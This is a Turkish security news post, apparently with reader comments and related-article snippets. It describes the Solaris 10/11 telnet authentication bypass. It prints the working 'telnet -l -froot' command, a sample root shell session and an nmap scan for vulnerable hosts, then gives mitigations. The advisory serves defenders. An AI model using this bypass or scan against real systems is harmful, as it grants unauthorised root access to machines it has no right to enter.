Solaris Sistemlerde Ciddi Güvenlik Açığı

0
FZ
Dün yayınlanan ve sadece Sun Solaris 10, Solaris 11 işletim sistemlerini etkileyen güvenlik açığı telnet servisine herhangi bir sistem kullanıcısının parolasız bağlanabilmesini sağlıyor. Eğer root kullanıcısının telnet erişim yetkisi varsa bu, parolayı bilmeden sisteme tam yetkili erişilmesi manasına geliyor. Benzer bir açık 1994 yılında bazı UNIX sistemlerinde de görülmüştü.

Güvenlik açığını nasıl test edersiniz?

$telnet -l -fkullanici_adi hedef_sistem

fbsd~$ telnet -l -froot 10.1.1.1

Trying 10.1.1.1...

Connected to 10.1.1.1.

Escape character is '^]'.

[ Trying mutual KERBEROS5 (host/10.1.1.1@1.1.1)... ]

Kerberos V5: mk_req failed (No such file or directory)

[ Trying KERBEROS5 (host/10.1.1.1@1.1.1)... ]

Kerberos V5: mk_req failed (No such file or directory)

Last login: Mon Feb 12 15:20:12 on console

Sun Microsystems Inc.   SunOS 5.10      Generic January 2005

Sourcing //.profile-EIS.....

root@solaris-test #

Ek olarak ağınızdaki Solaris tabanlı telnet sunucuları bulmak için nmap kullanabilirsiniz.

#nmap -sV  -p23 AĞ_Bloğunuz -oG solaris_telnet|grep "Sun Solaris"

Korunma Yolları

1) Solaris sistemden telnet servisi kapatılıp yerine daha güvenli erişim yöntemi olan SSH tercih edilebilir.

Telneti kapatmak için

solaris-test# svcadm disable telnet

2)Telnet servisi açık kalması gerekiyorsa öncelikle sisteme root kullanıcısının erişimi kısıtlanmalı. Bu en azından sisteme en yetkili hesapla bağlanılmasını engeller fakat sistemdeki diğer kullanıcıların(sys,adm, lp, vs.) sisteme parolasız erişimi hala mümkün olmaktadır.

Adım Adım telnet ile sisteme root erişimini engellemek /etc/default/login dosyası açılır. #CONSOLE=/dev/console satırı bulunur ve başındaki # kaldırılır. 3)Telnet servisine yapılan erişimler IP tabanlı kısıtlanabilir. Bunun için Solaris'de tcp_wrapper ve IPF kullanılabilir. Telnet servisi için tcp_wrapper desteğini aktif ederek telnet servisine yapılan erişimler ip/network tabanlı kısıtlamak için,

Telnet servisine için tcp_wrapper desteği verilir

#inetadm -m telnet tcp_wrappers=TRUE

ve /etc/hosts.allow, /etc/hosts.deny dosyaları kullanılarak belirli IP/ağlara erişim tanımlanır.

Huzeyfe ÖNAL - huzeyfe at enderunix.org

Görüşler

0
elrond
Şaka gibi bir açık bu. Şirkette adminlere söyledim kapatın şu rezillikleri diye inanmadılar ilk başta...

Asıl garip olan niye şimdi public oldu...
Görüş belirtmek için giriş yapın...

İlgili Yazılar

GMAIL güvenlik açığı

mos

Anet haber sunucusu, son_dakika ve internet.guvenlik gruplarına bu akşam yollanan habere göre İsrail web sitesi Nana, Google'ın beta aşamasındaki eletronik posta hesabı Gmail'in çok önemli bir güvenlik sorununa sahip olduğunu açıkladı. Buna göre yalnızca kullanıcı ismi ile, herhangi bir şifre gerektirmeden bir Gmail hesabını tam yetkiyle ele geçirmek mümkün.

Yazılım Yalan Söyler Mi? Adobe Acrobat Reader Vakası

FZ

Language Blog isimli ve genellikle dilbilimcilerin yazdığı bir kolektif blog'da Adobe Acrobat Reader ile ilgili bir girdi dikkatimi çekti.

Yazara göre Acrobat Reader'in Preferences kısmına gelir ve JavaScript'i kaldırmaya çalışırsanız baktığınız belgede JavaScript kullanıldığına ve bu özellik kaldırılırsa düzgün görüntüleme yapılamayacağına dair bir uyarı geliyor. Blog girdisinin yazarı Acrobat Reader 6.0.3'ü Mac üzerinde kullanırken böyle bir deneme yaptığında benzer bir şeyle karşılaştığını ancak işin garibi söz konusu belgenin kendi hazırladığı ve LaTeX'ten PDF'ye dönüştürdüğü bir belge olduğunu dolayısı ile JavaScript filan içermediğini belirtiyor! Dolayısı ile programın yalan söylemesi söz konusu.

Belgelerde JavaScript kullanılmasının sebebi ise Remote Approach isimli bir şirketin PDF okunduğu zaman bunun okundu bilgisini Internet üzerinden başka bir yere iletecek bir sistem geliştirmiş olması. "Web bug"lardan sonra başımıza bir de bu çıktı ;-) Neyse ki Acrobat Reader'daki JavaScript uyarılara rağmen iptal edilebiliyor.

Sygate'de artık Symantec Bünyesinde!

parsifal

Brightmail, Veritas derken, Sygate'de Symantec bünyesine dahil oldu.

Demek bundan sonra Sygate 2.0'ı register ederken "yaw yıllardır aynı siteden onay alıyor.", "Yok abi kesin numara bu inanma." muhabbetleride tozlu raflarda yerini alacak.
Nedense gözümün önüne bir anda Tünel'de bir atölye silueti belirdi. :)

Web Güvenliği E-Dergi

anonim

İlk sayısı Ağustos 2009`da yayımlanan Web Güvenlik Topluluğu (WGT) E-Dergi projesi ile web güvenliği bilincinin arttırılması amaçlanmaktadır.

Periyodik yayınlanacak dergide, uzmanlar tarafından birbirinden farklı konular kaleme alınırken, web/yazılım güvenliğinde güncel konuların ve teknolojilerin takibinin sağlanması da hedefleniyor.

Bilgisayar Korsanlarına Beş Yıla Kadar Hapis Cezası

FZ

Adalet Bakanlığı'nın bilişim suçlarına ilişkin hazırladığı kanun tasarısında, bilgisayar korsanlarına 2 yıldan 5 yıla kadar hapis ve adli para cezası verilmesi öngörülüyor. Bakanlık, "Bilişim Ağı Hizmetlerinin Düzenlenmesi ve Bilişim Suçları Hakkında Kanun Tasarısı"nı görüşlerini almak üzere diğer Bakanlıklar ve bakanlıklara bağlı kuruluşlar ile yüksek mahkemeler, üniversiteler, barolar, adli tıp, noterlik, bankalar, adli komisyon başkanlıklarının aralarında bulunduğu 100'den fazla kurum ve kuruluşa gönderdi. Bakanlık, söz konusu kurum ve kuruluşların görüşleri doğrultusunda değişik yaparak tasarıya son şeklini verecek.

Tasarıya göre, bilgisayar korsanlarına 2 yıldan 5 yıla kadar hapis ve adli para cezası da öngörülüyor. Buna göre, bir bilişim ağı aracılığıyla; bilişim sisteminde bulunan verileri veya programları hukuka aykırı olarak bozan, silen, değiştiren, yok eden, erişilmez kılan veya sisteme veri veya program yerleştiren, ekleyen, veri veya programlara zarar veren kişi, 2 yıldan 5 yıla kadar hapis ve adlî para cezası alacak.